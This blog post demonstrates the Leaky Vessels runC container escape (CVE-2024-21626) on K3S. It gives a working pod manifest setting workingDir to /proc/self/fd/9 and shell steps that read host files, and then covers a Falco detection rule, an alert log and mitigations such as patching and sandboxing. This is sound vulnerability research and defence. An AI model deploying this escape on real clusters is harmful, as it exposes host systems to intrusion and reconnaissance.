CloudNative.Quest

Quest to Cloud Native Computing

Discussion about the Leaky Vessels security vulnerability on K3S

Author:


Modified: Fri, 2024-Feb-09

Introduction

Recently, there is a container security vulnerability called Leaky Vessels (CVE-2024-21626) that could lead to container escaping. With this vulnerability, processes running inside the container may have access to the files on the host system. Several CVEs are related and affects runC, Docker and BuildKits (CVE-2024-21626, CVE-2024-23651, CVE-2024-23652 and CVE-2024-23653). This article focused on CVE-2024-21626, which affects the runC container runtime.

This vulnerability is caused by file descriptor leak in the runC container runtime. With specific conditions or exploit, attackers can leverage this vulnerability to gain read access on the host system or even overwrite files on the host file system (I think it may depend on whether root is used to run the container).

When I heard about this vulnerability, most articles demonstrated on how to exploit it on Docker systems (by creating and running a malicious container image). I tried another method to see if the vulnerability works on K3S. This is the first time that I saw container escaping vulnerability in real life.

Unpatched version of K3S is affected

K3S uses containerd, which uses the runC runtime. Instead of creating a malicious container image, I tried to set 'workDir' of a pod definition to override the working directory. Below is an example:

        ---
apiVersion: v1
kind: Pod
metadata:
  name: leaky-vessels
spec:
  containers:
    - name: leaky-vessels
      image: docker.io/library/alpine:3.19
      workingDir: /proc/self/fd/9
      command: ["/bin/sh", "-c", "sleep infinity"]
      privileged: false
      securityContext:
        allowPrivilegeEscalation: false
        capabilities:
          drop:
            - ALL
        privileged: false
        runAsNonRoot: true
        runAsUser: 1000000000
        runAsGroup: 1000000000
        seccompProfile:
          type: RuntimeDefault

Here, several security measures are enabled for the container system. For example, it is not allowed to run the pod as root. The pod is not allowed to have privilege escalation. The pod is dropping all the Linux capabilities. The pod has also set the seccomp profile. All these measures cannot prevent the Leaky Vessels attack on a vulnerable system.

Next, we did not create a malicious container image and then trick the owner to run the container image. We just override the working directory of the pod to '/proc/self/fd/9'. Depending on the runC versions, it is said the 'working directory' needs needs to set to 'proc/self/fd/n', where n is between 1 to 10.

When the pod is run, we login inside the pod:

        $ kubectl exec -it pod/leaky-vessels -- /bin/sh

 $ pwd

# This is container escaping
# We now have read access to the files on the host of the K3S system

 $ ../../../etc
 $ ls -l hostname
-rw-r--r--    1 root     root            17 Nov 11  2019 hostname

 $ cat hostname
k3s-controller.internal

Voila! Here we had it. Once the attacker escaped the container, even without write access, the attacker can do lots of things. The attacker could:

  • Read any files that is readable by the others group owner, including and not limited to:

    • Get the current hostname of the host server

    • Get the OS, Linux distribution of the host server (etc/redhat-release)

    • Get the DNS resolver of the host server

    • Access to the RPM database of the host server (e.g. strings rpmdb.sqlite | grep src.rpm | sort)

      • Then the attacks would know what packages is installed on the host

    • Access to proc/route, then the attackers would know the default gateway of the host

    • Access to proc/version, then the attackers would know the kernel version and architecture of the host

    • Access to proc/PID/stat, then the attackers would know some of the PID and process names that the host is running, For example:

              ls -1 */stat |  xargs awk '{print $1 " " $2}' | sort -n -k 1
              # These are PIDs and the process name
      33907 (nginx)
      33908 (nginx)
      33909 (nginx)
      33910 (nginx)
      33911 (nginx)

      Many of the process names of the host system are exposed.

Below is a demostration about the Leaky Vessels attack.

Detecting the Leaky Vessels vulnerability

Snyk releases some eBPF (static and dynamic) detectors:

However, it seems these detectors are designed for runC (Docker based) systems. It is not working for K3S in my testing.

We can use Falco to detect the vulnerability.

Here is the Falco rule (/etc/falco/rules.d/leaky-vessels.yaml) I used for this case:

        ---
- rule: Possible container escape attempt - Leaky Vessels
  desc: >
    Detecting a container procss that changes the current directory using a procfs file descriptor.
  condition: >
    ( container
    and evt.type = chdir
    and evt.dir = <
    and evt.rawres in (0, 1, 2)
    and evt.arg.path startswith "/proc/self/fd/" )
  output: >
    - Event time [%evt.datetime]
    - Possible container escape attempt detected.
    - Details
    evt.type=%evt.type
    evt.args=%evt.args
    evt.res=%evt.res
    proc.pid=%proc.pid proc.cwd=%proc.cwd
    proc.cmdline=%proc.cmdline proc.exepath=%proc.exepath
    proc.sid=%proc.sid
    proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline
    proc.vpid=%proc.vpid
    user.uid=%user.uid user.name=%user.name
    user.loginuid=%user.loginuid user.loginname=%user.loginname
    group.gid=%group.gid group.name=%group.name
    container.privileged=%container.privileged
    container.id=%container.id
    container.name=%container.name
    container.image=%container.image
    container.image.id=%container.image.id
    container_location=%container.image.repository:%container.image
    container.image.digest=%container.image.digest
    k8s.pod.name=%k8s.pod.name
  priority: WARNING
  tags: [host, container, cve-2024-21626]

Below log is logged to syslog in a single line. For it to be easier to view, I split them up to multiple lines.

        Feb  7 09:22:09 k3s-controller falco[1157671]: 09:22:09.819887134:
Warning - Event time [2024-02-07 09:22:09.819887134]
- Possible container escape attempt detected.
- Details evt.type=chdir evt.args=res=0 path=/proc/self/fd/9
evt.res=SUCCESS proc.pid=1158172
proc.cwd=/proc/self/fd/9/ proc.cmdline=runc:[1:CHILD] init
proc.exepath=/data/container/rancher/k3s/data/3dfc950bd39d2e2b435291ab8c1333aa6051fcaf46325aee898819f3b99d4b21/bin/runc
proc.sid=99 proc.ppid=1158164
proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/k3s/containerd/io.containerd.runtime.v2.task/k8s.io/babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b/log.json --log-format json exec --process /tmp/runc-process1490844986 --console-socket /tmp/pty3871979753/pty.sock --detach --pid-file /run/k3s/containerd/io.containerd.runtime.v2.task/k8s.io/babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b/fcbbe128159780ff084f695701c87b38638eada0c896bfc75304a779df3ed5be.pid babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b
proc.vpid=99
user.uid=0 user.name=root user.loginuid=-1 user.loginname=<NA>
group.gid=0 group.name=root
container.privileged=<NA> container.id= container.name=<NA> container.image=<NA>
container.image.id=<NA> container_location=<NA>:<NA>
container.image.digest=<NA> k8s.pod.name=<NA>

Remediation and prevention

  • One should check with vendors and upgrade the vulnerable systems to the patched version (e.g., runc, Docker, BuildKit, containerd, K3S, OpenShift, cloud service providers and etc.)

  • According to previous readings and articles, RedHat recommended users to configure SELinux in enforcing mode so that these suspicious activities could be blocked

  • Container sandboxing with Google gVisor I tried using the same method (setting workDir) on a older version of Google gVisor and Kata Containers on an unpatched K3S. The 'workDir' method does not work under container sandboxing. These sand boxing techniques provide an isolated environment and reduced the attack surface.

    • Result with Google gVisor

              $ kubectl describe pod/leaky-vessels
      
      Name:         leaky-vessels
      Containers:
        leaky-vessels:
          Container ID:  containerd://d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a
          Image:         docker.io/library/alpine:3.19
          Command:
            /bin/sh
            -c
            sleep infinity
          State:          Waiting
            Reason:       CrashLoopBackOff
          Last State:     Terminated
            Reason:       StartError
            Message:      failed to start containerd task "d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a": OCI runtime start failed: starting container: starting sub-container [/bin/sh -c sleep infinity]: creating process: failed to find initial working directory "/proc/self/fd/9": invalid argument: unknown
            Exit Code:    128
          Ready:          False
    • Result with Kata Containers

              Name:         leaky-vessels
      Containers:
        leaky-vessels:
          Container ID:  containerd://b03df3a00fd9856d5f36bac3f346aba8451bd7814e8538d691da58d851c5b650
          Image:         docker.io/library/alpine:3.19
          Port:          <none>
          Host Port:     <none>
          Command:
            /bin/sh
            -c
            sleep infinity
          State:          Waiting
            Reason:       RunContainerError
          Last State:     Terminated
            Reason:       StartError
            Message:      failed to create containerd task: failed to create shim task: No such file or directory (os error 2): unknown
            Exit Code:    128
          Ready:          False

Share this article


Related articles



Twitter responses: 1


Comments

No. of comments: 0

This site uses Akismet and Google Perspective API to reduce spam and abuses.
Please read and agree the privacy policy before using the comment system.